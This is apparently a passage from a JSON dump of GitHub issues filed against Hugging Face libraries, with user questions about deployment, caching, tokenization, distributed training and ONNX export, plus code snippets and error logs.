"https://github.com/huggingface/dataset-viewer/issues/1929", "state": "closed", "labels": [ "question", "refactoring / architecture", "P2" ], "created_at": "2023-10-05T08:24:50Z", "updated_at": "2024-02-22T21:24:09Z", "user": "severo" }, { "repo": "huggingface/huggingface.js", "number": 251, "title": "How to get SpaceRuntime information?", "body": "Inside hub library, I can see that there's `SpaceRuntime` which specify the hardware requirements. 
`SpaceRuntime` is defined inside `ApiSpaceInfo`.\r\n\r\nBut it seems that it's not being emitted.\r\n\r\n```\r\n\t\tconst items: ApiSpaceInfo[] = await res.json();\r\n\r\n\t\tfor (const item of items) {\r\n\t\t\tyield {\r\n\t\t\t\tid: item._id,\r\n\t\t\t\tname: item.id,\r\n\t\t\t\tsdk: item.sdk,\r\n\t\t\t\tlikes: item.likes,\r\n\t\t\t\tprivate: item.private,\r\n\t\t\t\tupdatedAt: new Date(item.lastModified),\r\n\t\t\t};\r\n\t\t}\r\n```\r\n\r\nSo, is there any way I can grab that information?", "url": "https://github.com/huggingface/huggingface.js/issues/251", "state": "closed", "labels": [], "created_at": "2023-10-04T18:23:42Z", "updated_at": "2023-10-05T08:26:07Z", "user": "namchuai" }, { "repo": "huggingface/chat-ui", "number": 471, "title": "Custom chatbot which includes sources such as pdf,databases and a specific website only.", "body": "I have a chatbot which can query a pdf, a database, and a particular website in python. How do I include things like the quantized models, RAG sources, and the retrieval logic in this chat UI?", "url": "https://github.com/huggingface/chat-ui/issues/471", "state": "closed", "labels": [], "created_at": "2023-10-04T04:36:23Z", "updated_at": "2024-07-08T16:22:02Z", "comments": 2, "user": "pranavbhat12" }, { "repo": "huggingface/huggingface.js", "number": 250, "title": "How to apply pagination for listModels?", "body": "Thanks for the library!\r\n\r\nCould you please help me with how I can apply pagination for the `listModels` API from @huggingface/hub?\r\n\r\nI don't know how to specify the offset.", "url": "https://github.com/huggingface/huggingface.js/issues/250", "state": "closed", "labels": [], "created_at": "2023-10-03T12:39:17Z", "updated_at": "2023-10-04T01:27:01Z", "user": "namchuai" }, { "repo": "huggingface/transformers.js", "number": 341, "title": "[Question] Custom stopping criteria for text generation models", "body": "Is it possible to pass a custom `stopping_criteria` to the `generate()` method? Is there a way to interrupt generation mid-flight?", "url": "https://github.com/huggingface/transformers.js/issues/341", "state": "closed", "labels": [ "question" ], "created_at": "2023-10-02T10:35:33Z", "updated_at": "2025-10-11T10:12:10Z", "user": "krassowski" }, { "repo": "huggingface/datasets", "number": 6273, "title": "Broken Link to PubMed Abstracts dataset.", "body": "### Describe the bug\n\nThe link provided for the dataset is broken,\r\ndata_files = \r\n[https://the-eye.eu/public/AI/pile_preliminary_components/PUBMED_title_abstracts_2019_baseline.jsonl.zst](url)\r\n\r\nThe \n\n### Steps to reproduce the bug\n\nSteps to reproduce:\r\n\r\n1) Head over to [https://huggingface.co/learn/nlp-course/chapter5/4?fw=pt#big-data-datasets-to-the-rescue](url)\r\n\r\n2) In the Section \"What is the Pile?\", you can see a code snippet that contains the broken link.\n\n### Expected behavior\n\nThe link should redirect to the \"PubMed Abstracts dataset\" as expected.\n\n### Environment info\n\n.", "url": "https://github.com/huggingface/datasets/issues/6273", "state": "open", "labels": [], "created_at": "2023-10-01T19:08:48Z", "updated_at": "2024-04-28T02:30:42Z", "comments": 5, "user": "sameemqureshi" }, { "repo": "huggingface/chat-ui", "number": 466, "title": "Deploy with Langchain Agent", "body": "I have built a Langchain agent which interacts with a Vicuna model hosted with TGI, and the web UI is currently hosted with Gradio on Spaces. I'd like the UI to be more polished (like huggingchat/chatgpt), with persistence. I couldn't find any docs related to how to use a Langchain agent with chat-ui. 
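For reference, the agent side currently talks to TGI roughly like this (a sketch; the class name is from the langchain version I'm on, and the URL is assumed):

```python
from langchain.llms import HuggingFaceTextGenInference

llm = HuggingFaceTextGenInference(
    inference_server_url="http://localhost:8080/",  # TGI endpoint (assumed)
    max_new_tokens=512,
    temperature=0.01,
)
print(llm("What is Deep Learning?"))
```
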
If anyone could shed some light on this or point me towards the relevant resources, I would appreciate it.\r\n\r\nThank you for your help.", "url": "https://github.com/huggingface/chat-ui/issues/466", "state": "closed", "labels": [], "created_at": "2023-09-30T21:29:38Z", "updated_at": "2023-10-03T09:14:48Z", "comments": 1, "user": "Tejaswgupta" }, { "repo": "huggingface/accelerate", "number": 2018, "title": "A demo of how to perform multi-GPU parallel inference for transformer LLM is needed", "body": "In the current demo: \"[Distributed inference using Accelerate](https://huggingface.co/docs/accelerate/usage_guides/distributed_inference )\", it is still not clear how to perform multi-GPU parallel inference for a transformer LLM. This gap in the demo has hindered not just me, but also many people in adopting your solution: https://www.reddit.com/r/LocalLLaMA/comments/15rlqsb/how_to_perform_multigpu_parallel_inference_for/\r\nAlso, in the replies, other frameworks have already started competing for this specific use case. \r\n\r\nCould you provide a demo for this use case? ", "url": "https://github.com/huggingface/accelerate/issues/2018", "state": "closed", "labels": [], "created_at": "2023-09-30T14:10:30Z", "updated_at": "2025-02-10T00:27:24Z", "user": "KexinFeng" }, { "repo": "huggingface/candle", "number": 1006, "title": "Question: How to use quantized tensors?", "body": "Hello everybody,\r\n\r\nI was looking through Candle's quantized tensor code when I noticed that there is only a matmul_t implemented for QuantizedType, and no other operations. Perhaps other operations could be added?\r\n\r\nIn addition, is there an example of using quantized tensors/converting them from normal tensors?\r\n\r\nThanks!", "url": "https://github.com/huggingface/candle/issues/1006", "state": "closed", "labels": [], "created_at": "2023-09-30T13:35:16Z", "updated_at": "2024-08-17T15:20:58Z", "user": "EricLBuehler" }, { "repo": "huggingface/transformers.js", "number": 340, "title": "question", "body": "hi @xenova, is there still any position as a js/ts backend developer? Next week, 06 oct, I will be free after finishing the senlife project I am working on for a UK client. This is the app that I built the backend for: \r\nhttps://play.google.com/store/apps/details?id=com.senlife.app&hl=en&gl=US\r\n", "url": "https://github.com/huggingface/transformers.js/issues/340", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-30T11:35:23Z", "updated_at": "2023-10-02T10:01:20Z", "user": "jedLahrim" }, { "repo": "huggingface/chat-ui", "number": 465, "title": "Where to deploy other than HF?", "body": "Hey,\r\n\r\nI've been trying to deploy the chat-ui somewhere I can use a custom domain (such as vercel and azure). 
\r\n\r\nEach of them comes with different problems that I have yet to solve.\r\n\r\nVercel issues described [here](https://github.com/huggingface/chat-ui/issues/212).\r\n\r\nIt does not seem like I can deploy this as a Azure SWA, as it fails when using the azure-swa-adapter for sveltekit with the following error.\r\n\r\n```\r\nUsing adapter-azure-swa\r\n\u2718 [ERROR] Top-level await is currently not supported with the \"cjs\" output format\r\n\r\n .svelte-kit/output/server/chunks/models.js:94:15:\r\n 94 \u2502 const models = await Promise.all(\r\n \u2575 ~~~~~\r\n\r\n\u2718 [ERROR] Top-level await is currently not supported with the \"cjs\" output format\r\n\r\n .svelte-kit/output/server/entries/endpoints/conversation/_id_/_server.ts.js:199:18:\r\n 199 \u2502 const extractor = await pipeline(\"feature-extraction\", modelId);\r\n \u2575 ~~~~~\r\n\r\n\u25b2 [WARNING] \"./xhr-sync-worker.js\" should be marked as external for use with \"require.resolve\" [require-resolve-not-external]\r\n\r\n node_modules/jsdom/lib/jsdom/living/xhr/XMLHttpRequest-impl.js:31:57:\r\n 31 \u2502 ... require.resolve ? require.resolve(\"./xhr-sync-worker.js\") : null;\r\n \u2575 ~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nerror during build:\r\nError: Build failed with 2 errors:\r\n.svelte-kit/output/server/chunks/models.js:94:15: ERROR: Top-level await is currently not supported with the \"cjs\" output format\r\n.svelte-kit/output/server/entries/endpoints/conversation/_id_/_server.ts.js:199:18: ERROR: Top-level await is currently not supported with the \"cjs\" output format\r\n at failureErrorWithLog (/github/workspace/node_modules/svelte-adapter-azure-swa/node_modules/esbuild/lib/main.js:1575:15)\r\n at /github/workspace/node_modules/svelte-adapter-azure-swa/node_modules/esbuild/lib/main.js:1033:28\r\n at /github/workspace/node_modules/svelte-adapter-azure-swa/node_modules/esbuild/lib/main.js:978:67\r\n at buildResponseToResult (/github/workspace/node_modules/svelte-adapter-azure-swa/node_modules/esbuild/lib/main.js:1031:7)\r\n at /github/workspace/node_modules/svelte-adapter-azure-swa/node_modules/esbuild/lib/main.js:1143:14\r\n at responseCallbacks. (/github/workspace/node_modules/svelte-adapter-azure-swa/node_modules/esbuild/lib/main.js:680:9)\r\n at handleIncomingPacket (/github/workspace/node_modules/svelte-adapter-azure-swa/node_modules/esbuild/lib/main.js:735:9)\r\n at Socket.readFromStdout (/github/workspace/node_modules/svelte-adapter-azure-swa/node_modules/esbuild/lib/main.js:656:7)\r\n at Socket.emit (node:events:514:28)\r\n at addChunk (node:internal/streams/readable:324:12)\r\n\r\n\r\n---End of Oryx build logs---\r\nOryx has failed to build the solution.\r\n\r\n```\r\n\r\nAny suggestions on how I can otherwise deploy this?", "url": "https://github.com/huggingface/chat-ui/issues/465", "state": "closed", "labels": [], "created_at": "2023-09-29T13:58:42Z", "updated_at": "2023-12-07T19:10:00Z", "comments": 2, "user": "mhenrichsen" }, { "repo": "huggingface/dataset-viewer", "number": 1892, "title": "Use swap to avoid OOM?", "body": "The pods don't have swap. 
Is it possible to have swap to avoid OOM, even at the expense of longer processing time in workers?", "url": "https://github.com/huggingface/dataset-viewer/issues/1892", "state": "closed", "labels": [ "question", "infra", "P2" ], "created_at": "2023-09-29T13:48:54Z", "updated_at": "2024-06-19T14:23:36Z", "user": "severo" }, { "repo": "huggingface/transformers.js", "number": 337, "title": "[Question] How do I specify a non-huggingface URL (that doesn't start with `/models/`) in `AutoTokenizer.from_pretrained`?", "body": "My tokenizer files are hosted within this folder:\r\n```\r\nhttps://example.com/public/models/TheBloke/Llama-2-13B-GPTQ/\r\n```\r\nFirst I load the lib:\r\n```js\r\nlet { AutoTokenizer } = await import('https://cdn.jsdelivr.net/npm/@xenova/transformers@2.6.1');\r\n```\r\nThen I tried what I thought would be the most obvious/intuitive API:\r\n```js\r\nawait AutoTokenizer.from_pretrained(\"/public/models/TheBloke/Llama-2-13B-GPTQ\")\r\n// requests: https://example.com/models/public/models/TheBloke/Llama-2-13B-GPTQ/tokenizer.json\r\n```\r\nThis is strongly counter-intuitive to me. If I add a `/` at the start of the URL, it shouldn't add anything before that. A path that starts with `/` on the web always means \"append this to the origin\".\r\n\r\nSo I read the docs, and it seems to suggest that you need to put at `.` on the end:\r\n```js\r\nawait AutoTokenizer.from_pretrained(\"/public/models/TheBloke/Llama-2-13B-GPTQ/.\")\r\n// requests: https://example.com/models/public/models/TheBloke/Llama-2-13B-GPTQ/tokenizer.json \r\n```\r\nNope. So the next obvious step was to just give it an absolute URL and be done with it:\r\n```js\r\nawait AutoTokenizer.from_pretrained(\"https://example.com/public/models/TheBloke/Llama-2-13B-GPTQ\")\r\n// requests: 'https://huggingface.co/https://example.com/public/models/TheBloke/Llama-2-13B-GPTQ/resolve/main/tokenizer_config.json\r\n```\r\nOof.\r\n\r\nSo I'm a bit confused here \ud83d\ude35\u200d\ud83d\udcab\r\n\r\nGoing to keep trying, but I've spent 20 minutes on this so far, so posting here so you can improve the DX around this, even if I do manage to solve it myself soon.", "url": "https://github.com/huggingface/transformers.js/issues/337", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-28T21:00:41Z", "updated_at": "2023-09-28T22:03:05Z", "user": "josephrocca" }, { "repo": "huggingface/transformers.js", "number": 334, "title": "[Question] failed to call OrtRun(). error code = 1. When I try to load Xenova/pygmalion-350m", "body": "I'm getting an error `failed to call OrtRun(). error code = 1.` When I try to load Xenova/pygmalion-350m. The error is as follows\r\n```\r\nwasm-core-impl.ts:392 Uncaught Error: failed to call OrtRun(). 
error code = 1.\r\n at e.run (wasm-core-impl.ts:392:19)\r\n at e.run (proxy-wrapper.ts:215:17)\r\n at e.OnnxruntimeWebAssemblySessionHandler.run (session-handler.ts:100:15)\r\n at InferenceSession.run (inference-session-impl.ts:108:40)\r\n at sessionRun (models.js:191:36)\r\n at async Function.decoderForward [as _forward] (models.js:478:26)\r\n at async Function.forward (models.js:743:16)\r\n at async Function.decoderRunBeam [as _runBeam] (models.js:564:18)\r\n at async Function.runBeam (models.js:1284:16)\r\n at async Function.generate (models.js:1009:30)\r\n```\r\n\r\nAnd my Code for running it is this\r\n\r\n```\r\n\r\nlet text = 'Once upon a time, there was';\r\nlet generator = await pipeline('text-generation', 'Xenova/pygmalion-350m');\r\nlet output = await generator(text, {\r\n temperature: 2,\r\n max_new_tokens: 10,\r\n repetition_penalty: 1.5,\r\n no_repeat_ngram_size: 2,\r\n num_beams: 2,\r\n num_return_sequences: 2,\r\n});\r\n\r\nconsole.log(output);\r\n```\r\n\r\nI see that `OrtRun` is something returned by the OnnxRuntime on a failure but have you had success in running the Pygmalion-350m model ?", "url": "https://github.com/huggingface/transformers.js/issues/334", "state": "open", "labels": [ "question" ], "created_at": "2023-09-28T01:34:36Z", "updated_at": "2023-12-16T17:14:12Z", "user": "sebinthomas" }, { "repo": "huggingface/datasets", "number": 6267, "title": "Multi label class encoding", "body": "### Feature request\n\nI have a multi label dataset and I'd like to be able to class encode the column and store the mapping directly in the features just as I can with a single label column. `class_encode_column` currently does not support multi labels.\r\n\r\nHere's an example of what I'd like to encode:\r\n\r\n```\r\ndata = {\r\n 'text': ['one', 'two', 'three', 'four'],\r\n 'labels': [['a', 'b'], ['b'], ['b', 'c'], ['a', 'd']]\r\n}\r\n\r\ndataset = Dataset.from_dict(data)\r\ndataset = dataset.class_encode_column('labels')\r\n```\r\n\r\nI did some digging into the code base to evaluate the feasibility of this (note I'm very new to this code base) and from what I noticed the `ClassLabel` feature is still stored as an underlying raw data type of int so I thought a `MultiLabel` feature could similarly be stored as a Sequence of ints, thus not requiring significant serialization / conversion work to / from arrow.\r\n\r\nI did a POC of this [here](https://github.com/huggingface/datasets/commit/15443098e9ce053943172f7ec6fce3769d7dff6e) and included a simple test case (please excuse all the commented out tests, going for speed of POC here and didn't want to fight IDE to debug a single test). In the test I just assert that `num_classes` is the same to show that things are properly serializing, but if you break after loading from disk you'll see the dataset correct and the dataset feature is as expected.\r\n\r\nAfter digging more I did notice a few issues\r\n- After loading from disk I noticed type of the `labels` class is `Sequence` not `MultiLabel` (though the added `feature` attribute came through). This doesn't happen for `ClassLabel` but I couldn't find the encode / decode code paths that handle this.\r\n- I subclass `Sequence` in `MultiLabel` to leverage existing serialization, but this does miss the custom encode logic that `ClassLabel` has. I'm not sure of the best way to approach this as I haven't fully understood the encode / decode flow for datasets. 
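For comparison, the workaround I currently rely on is a plain cast to a sequence of ClassLabel, which loses a dedicated multi-label type but does round-trip the names (a sketch; I haven't checked every edge case):

```python
from datasets import ClassLabel, Dataset, Sequence

data = {"text": ["one", "two"], "labels": [["a", "b"], ["b"]]}
ds = Dataset.from_dict(data)
# cast the string lists to integer class ids, keeping the names in the feature
ds = ds.cast_column("labels", Sequence(ClassLabel(names=["a", "b", "c", "d"])))
print(ds[0]["labels"], ds.features["labels"].feature.names)
```
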
I suspect my simple implementation will need some improvement as it'll require a significant amount of repeated logic to mimic `ClassLabel` behavior.\r\n\r\n\n\n### Motivation\n\nSee above - would like to support multi label class encodings.\n\n### Your contribution\n\nThis would be a big help for us and we're open to contributing but I'll likely need some guidance on how to implement to fit the encode / decode flow. Some suggestions on tests / would be great too, I'm guessing in addition to the class encode tests (that I'll need to expand) we'll need encode / decode tests.", "url": "https://github.com/huggingface/datasets/issues/6267", "state": "open", "labels": [ "enhancement" ], "created_at": "2023-09-27T22:48:08Z", "updated_at": "2023-10-26T18:46:08Z", "comments": 7, "user": "jmif" }, { "repo": "huggingface/huggingface_hub", "number": 1698, "title": "How to change cache dir?", "body": "### Describe the bug\n\nby default, all downloaded models are stored on \r\n\r\n> cache_path = '/root/.cache/huggingface/hub'\r\n\r\nIs there a way to change this dir to something else?\r\n\r\nI tried to set \"HUGGINGFACE_HUB_CACHE\"\r\n\r\n```\r\nimport os\r\nos.environ['HUGGINGFACE_HUB_CACHE'] = '/my_workspace/models_cache'\r\n```\r\n\r\nbut it doesn't work,\n\n### Reproduction\n\n_No response_\n\n### Logs\n\n_No response_\n\n### System info\n\n```shell\n- huggingface_hub version: 0.17.2\r\n- Platform: Linux-5.4.0-162-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- Running in iPython ?: No\r\n- Running in notebook ?: No\r\n- Running in Google Colab ?: No\r\n- Token path ?: /root/.cache/huggingface/token\r\n- Has saved token ?: True\r\n- Who am I ?: adhikjoshi\r\n- Configured git credential helpers: \r\n- FastAI: N/A\r\n- Tensorflow: N/A\r\n- Torch: 2.2.0.dev20230922+cu118\r\n- Jinja2: 3.1.2\r\n- Graphviz: N/A\r\n- Pydot: N/A\r\n- Pillow: 10.0.1\r\n- hf_transfer: N/A\r\n- gradio: N/A\r\n- tensorboard: N/A\r\n- numpy: 1.24.4\r\n- pydantic: 2.3.0\r\n- aiohttp: N/A\r\n- ENDPOINT: https://huggingface.co\r\n- HUGGINGFACE_HUB_CACHE: /root/.cache/huggingface/hub\r\n- HUGGINGFACE_ASSETS_CACHE: /root/.cache/huggingface/assets\r\n- HF_TOKEN_PATH: /root/.cache/huggingface/token\r\n- HF_HUB_OFFLINE: False\r\n- HF_HUB_DISABLE_TELEMETRY: False\r\n- HF_HUB_DISABLE_PROGRESS_BARS: None\r\n- HF_HUB_DISABLE_SYMLINKS_WARNING: False\r\n- HF_HUB_DISABLE_EXPERIMENTAL_WARNING: False\r\n- HF_HUB_DISABLE_IMPLICIT_TOKEN: False\r\n- HF_HUB_ENABLE_HF_TRANSFER: False\n```\n", "url": "https://github.com/huggingface/huggingface_hub/issues/1698", "state": "closed", "labels": [ "bug" ], "created_at": "2023-09-27T07:45:30Z", "updated_at": "2023-09-27T09:08:34Z", "user": "adhikjoshi" }, { "repo": "huggingface/accelerate", "number": 2010, "title": "How to set different seed for DDP data sampler for every epoch", "body": "Hello there!\r\nI am using the following code to build my data loader.\r\n```python\r\n data_loader_train = DataLoader(\r\n dataset_train,\r\n collate_fn=collate_fn,\r\n batch_size=cfg.data.train_batch_size,\r\n num_workers=cfg.data.num_workers,\r\n pin_memory=cfg.data.pin_memory,\r\n )\r\ndata_loader_train = accelerator.prepare(data_loader_train)\r\n```\r\nI am using DDP for training and I want to set different data sample seed for every epoch, so that different epochs will have different batch data orders. 
How can I do that?", "url": "https://github.com/huggingface/accelerate/issues/2010", "state": "closed", "labels": [], "created_at": "2023-09-27T02:46:10Z", "updated_at": "2023-09-27T11:32:22Z", "user": "Mountchicken" }, { "repo": "huggingface/transformers", "number": 26412, "title": "How to run Trainer + DeepSpeed + Zero3 + PEFT ", "body": "### System Info\n\n- `transformers` version: 4.34.0.dev0\r\n- Platform: Linux-5.14.0-284.25.1.el9_2.x86_64-x86_64-with-glibc2.34\r\n- Python version: 3.11.4\r\n- Huggingface_hub version: 0.16.4\r\n- Safetensors version: 0.3.3\r\n- Accelerate version: 0.24.0.dev0\r\n- Accelerate config: not found\r\n- PyTorch version (GPU?): 2.0.1+cu117 (True)\r\n\n\n### Who can help?\n\n @ArthurZucker and @younesbelkada and @pacman100 and @muellerzr \n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n[This script](https://gist.github.com/BramVanroy/f2abb3940111b73ae8923822ef6096dd) is a modification of the official run_clm script. The only additions are the BNB config and PEFT. Yet, I cannot get it to work with a [deepspeed zero3 config](https://github.com/philschmid/deep-learning-pytorch-huggingface/blob/main/training/configs/ds_falcon_180b_z3.json).\r\n\r\nRequirements to install:\r\n\r\n```\r\naccelerate >= 0.12.0\r\ntorch >= 1.3\r\ndatasets >= 1.8.0\r\nsentencepiece != 0.1.92\r\nprotobuf\r\nevaluate\r\nscikit-learn\r\ntrl\r\npeft\r\nbitsandbytes\r\n```\r\n\r\nIn the past I have had issues with low_cpu_mem_usage, but neither a true nor a false value seems to get this to work:\r\n\r\nCommand 1:\r\n\r\n```sh\r\ndeepspeed --include=\"localhost:0,1\" run_clm.py \\\r\n --model_name_or_path facebook/opt-125m\\\r\n --dataset_name wikitext\\\r\n --dataset_config_name wikitext-2-raw-v1\\\r\n --per_device_train_batch_size 2\\\r\n --per_device_eval_batch_size 2\\\r\n --do_train\\\r\n --do_eval\\\r\n --output_dir /tmp/test-clm\\\r\n --deepspeed deepspeed_configs/ds_config_zero3.json\\\r\n --low_cpu_mem_usage true\r\n```\r\n==> `ValueError: DeepSpeed Zero-3 is not compatible with `low_cpu_mem_usage=True` or with passing a `device_map`.`\r\n\r\nCommand 2:\r\n\r\n```sh\r\ndeepspeed --include=\"localhost:0,1\" run_clm.py \\\r\n --model_name_or_path facebook/opt-125m\\\r\n --dataset_name wikitext\\\r\n --dataset_config_name wikitext-2-raw-v1\\\r\n --per_device_train_batch_size 2\\\r\n --per_device_eval_batch_size 2\\\r\n --do_train\\\r\n --do_eval\\\r\n --output_dir /tmp/test-clm\\\r\n --deepspeed deepspeed_configs/ds_config_zero3.json\\\r\n --low_cpu_mem_usage false\r\n```\r\n\r\n==> `ValueError: weight is on the meta device, we need a `value` to put in on 0.`\n\n### Expected behavior\n\nAny option to make this combination of Trainer + DeepSpeed + Zero3 + PEFT work.", "url": "https://github.com/huggingface/transformers/issues/26412", "state": "open", "labels": [ "WIP" ], "created_at": "2023-09-26T10:31:46Z", "updated_at": "2024-01-11T15:40:02Z", "user": "BramVanroy" }, { "repo": "huggingface/setfit", "number": 423, "title": "[Q] How to examine correct/wrong predictions in trainer.evaluate()", "body": "Hello,\r\n\r\nAfter doing \"metrics = trainer.evaluate()\" as shown in the example code, is there a way to examine which rows in the evaluation dataset were predicted correctly?\r\n\r\nThanks! 
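Since `trainer.evaluate()` only returns aggregate metrics, one workaround is to run the model's `predict` over the eval split and compare row by row. A minimal sketch; the column names `text`/`label` are assumptions, adjust them to your dataset:

```python
# Assumes a trained SetFit trainer and an eval split with "text"/"label" columns.
predictions = trainer.model.predict(eval_dataset["text"])

for text, label, pred in zip(eval_dataset["text"], eval_dataset["label"], predictions):
    if pred != label:
        print(f"misclassified: {text!r} (expected {label}, got {pred})")
```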
", "url": "https://github.com/huggingface/setfit/issues/423", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-25T23:41:53Z", "updated_at": "2023-11-24T13:04:45Z", "user": "youngjin-lee" }, { "repo": "huggingface/chat-ui", "number": 461, "title": "The custom endpoint response doesn't stream even though the endpoint is sending streaming content", "body": "@nsarrazin I'm transmitting the streaming response to the chat UI, but it displays all the content simultaneously rather than progressively streaming the text generation part. Can you help me address this issue?\r\n\r\nReference: #380 ", "url": "https://github.com/huggingface/chat-ui/issues/461", "state": "open", "labels": [ "support" ], "created_at": "2023-09-25T07:43:57Z", "updated_at": "2023-10-29T11:21:04Z", "comments": 2, "user": "nandhaece07" }, { "repo": "huggingface/autotrain-advanced", "number": 279, "title": "How to run AutoTrain Advanced UI locally", "body": "How to run AutoTrain Advanced UI locally \ud83d\ude22 ", "url": "https://github.com/huggingface/autotrain-advanced/issues/279", "state": "closed", "labels": [], "created_at": "2023-09-25T07:25:51Z", "updated_at": "2024-04-09T03:20:17Z", "user": "LronDC" }, { "repo": "huggingface/transformers.js", "number": 328, "title": "[Question] React.js serve sentence bert in browser keep reporting models not found.", "body": "my codes:\r\n```javascript\r\nexport const useInitTransformers = () => {\r\n const init = async () => {\r\n // @ts-ignore\r\n env.allowLocalModels = false;\r\n extractor = await pipeline(\r\n \"feature-extraction\",\r\n \"Xenova/all-mpnet-base-v2\",\r\n );\r\n };\r\n return { init };\r\n};\r\n```\r\n\r\nI'm building a frontend with React that can serve sentence bert directly in browser, but no idea why even i add the line\r\n`env.allowLocalModels = false`\r\n before pipeline loading the model. In the production environment, it's still trying to access model locally `/models/...`, but which will never exists in this usecase. \r\n\r\n**Is there any way i can bypass this check and directly pull the model from remote?**\r\n \r\n![image](https://github.com/xenova/transformers.js/assets/26846727/9b6222d7-cb02-44c1-b4e5-b3ab3f52797e)\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/328", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-24T15:51:47Z", "updated_at": "2024-10-18T13:30:11Z", "user": "bianyuanop" }, { "repo": "huggingface/candle", "number": 944, "title": "Question: How to tokeninize text for Llama?", "body": "Hello everybody,\n\nHow can I tokenize text to use with Llama? I want to fine-tune Llama on my custom data, so how can I tokenize from a String and then detokenize the logits into a String?\n\nI have looked at the Llama example for how to detokenize, but cannot find any clear documentation on how the implementation actually works for outputting results during training.\n\nThanks!", "url": "https://github.com/huggingface/candle/issues/944", "state": "closed", "labels": [], "created_at": "2023-09-23T18:19:56Z", "updated_at": "2023-09-23T23:01:13Z", "user": "EricLBuehler" }, { "repo": "huggingface/transformers.js", "number": 327, "title": "Calling pipeline returns `undefined`. What are possible reasons?", "body": "The repository if you need it \u25b6\u25b6\u25b6 [China Cups](https://github.com/piscopancer/china-cups)\r\n\r\n## Next 13.5 / server-side approach\r\n\r\nJust started digging into your library. 
Sorry for stupidity.\r\n\r\n### `src/app/api/translate/route.ts` \ud83d\udc47\r\n```ts\r\nimport { NextRequest, NextResponse } from 'next/server'\r\nimport { PipelineSingleton } from '@/utils/pipeline'\r\n\r\nexport async function GET(request: NextRequest) {\r\n\tconst text = request.nextUrl.searchParams.get('text')\r\n\tif (!text) {\r\n\t\treturn NextResponse.json(\r\n\t\t\t{\r\n\t\t\t\terror: 'Missing text',\r\n\t\t\t},\r\n\t\t\t{ status: 400 },\r\n\t\t)\r\n\t}\r\n\tconst translator = await PipelineSingleton.getInstance()\r\n\tconst translation = await translator(text)\r\n\tconsole.log(translation) // undefined\r\n\treturn NextResponse.json(translation)\r\n}\r\n```\r\n\r\n### `src/utils/pipeline.ts` \ud83d\udc47\r\nThis singleton must be fine, I suppose. \r\n```ts\r\nimport { Pipeline, pipeline } from '@xenova/transformers'\r\nimport { PretrainedOptions } from '@xenova/transformers/types/models'\r\n\r\nfunction DeclarePipeline() {\r\n\treturn class PipelineSingleton {\r\n\t\tstatic task = 'question-answering'\r\n\t\tstatic model = undefined as undefined | string\r\n\t\tstatic instance = null as null | Promise\r\n\r\n\t\tstatic async getInstance(options?: PretrainedOptions) {\r\n\t\t\tif (!this.instance) {\r\n\t\t\t\tthis.instance = pipeline(this.task, this.model, options)\r\n\t\t\t}\r\n\t\t\treturn this.instance\r\n\t\t}\r\n\t}\r\n}\r\n\r\nexport const PipelineSingleton = (() => {\r\n\tif (process.env.NODE_ENV !== 'production') {\r\n\t\tconst gl = global as any\r\n\t\tif (!gl.PipelineSingleton) {\r\n\t\t\tgl.PipelineSingleton = DeclarePipeline()\r\n\t\t}\r\n\t\treturn gl.PipelineSingleton\r\n\t}\r\n\treturn DeclarePipeline()\r\n})() as ReturnType\r\n```\r\n### `src/app/page.tsx`This is how I query it \ud83d\udc47\r\nBtw, no errors occur on this stage\r\n```tsx\r\nexport default async function HomePage({ searchParams }: THomePage) {\r\n\tconst text = 'Hello'\r\n\tconst translation = await axios.get(`/translate?text=${text}`).then((res) => res.data())\r\n\t// const translation = await fetch(`/translate?text=${encodeURIComponent(text)}`).then((res) => res.json())\r\n\treturn
{JSON.stringify(translation)}
\r\n```\r\n\r\n## One more very important thing\r\nWhen I **manually** go to `http://localhost:3000/api/translate?text=Hello` I very happily get this error:\r\n```\r\n \u2a2f TypeError: Value is not JSON serializable\r\n at serializeJavascriptValueToJSONString (node:internal/deps/undici/undici:1203:15)\r\n at Response.json (node:internal/deps/undici/undici:6746:55)\r\n at NextResponse.json (webpack-internal:///(rsc)/./node_modules/next/dist/server/web/spec-extension/response.js:66:35)\r\n at GET (webpack-internal:///(rsc)/./src/app/api/translate/route.ts:24:95)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async C:\\web-dev\\next\\china-cups\\node_modules\\next\\dist\\compiled\\next-server\\app-route.runtime.dev.js:1:66877\r\n ```\r\n \ud83d\udc46 the browser cannot load this url if text=... is present \ud83d\ude1f.\r\n\r\n \ud83d\udc96\r\n ", "url": "https://github.com/huggingface/transformers.js/issues/327", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-23T15:57:24Z", "updated_at": "2023-09-24T06:55:08Z", "user": "piscopancer" }, { "repo": "huggingface/optimum", "number": 1410, "title": "Export TrOCR to ONNX", "body": "I was trying to export my fine-tuned TrOCR model to ONNX using following command. I didn't get any errors, but in onnx folder only encoder model is saved.\r\n```\r\n!python -m transformers.onnx --model=model_path --feature=vision2seq-lm onnx/ --atol 1e-2\r\n```\r\nSo, regarding this, I have 2 questions.\r\n1. How to save decoder_model.onnx, so that I can use [this inference script](https://gist.github.com/mht-sharma/f38c670930ac7df413c07327e692ee39).\r\n2. If it is not possible to export the decoder model to ONNX, how can I perform inference using encoder_model.onnx? According to my understanding, model.generate() takes time to generate output, while the decode method doesn't consume as much time compared to the generate method. Is there any way to use encoder_model.onnx with the existing decoder model in order to optimize response time?\r\n```\r\np = processor(image, return_tensors=\"pt\").pixel_values\r\ngenerated_ids = model.generate(\r\n p,\r\n do_sample=True,\r\n top_k=5,\r\n top_p=0.1,\r\n num_beams=4,\r\n num_return_sequences=1,\r\n output_scores=True,\r\n use_cache=True,\r\n return_dict_in_generate=True\r\n)\r\n\r\ngenerated_text = processor.batch_decode(generated_ids.sequences, skip_special_tokens=True)[0]\r\n\r\n```\r\n\r\nPlease correct me if this approach to optimize response time is wrong.\r\nThanks.", "url": "https://github.com/huggingface/optimum/issues/1410", "state": "closed", "labels": [ "onnx" ], "created_at": "2023-09-23T09:19:50Z", "updated_at": "2024-10-15T16:21:52Z", "comments": 2, "user": "VallabhMahajan1" 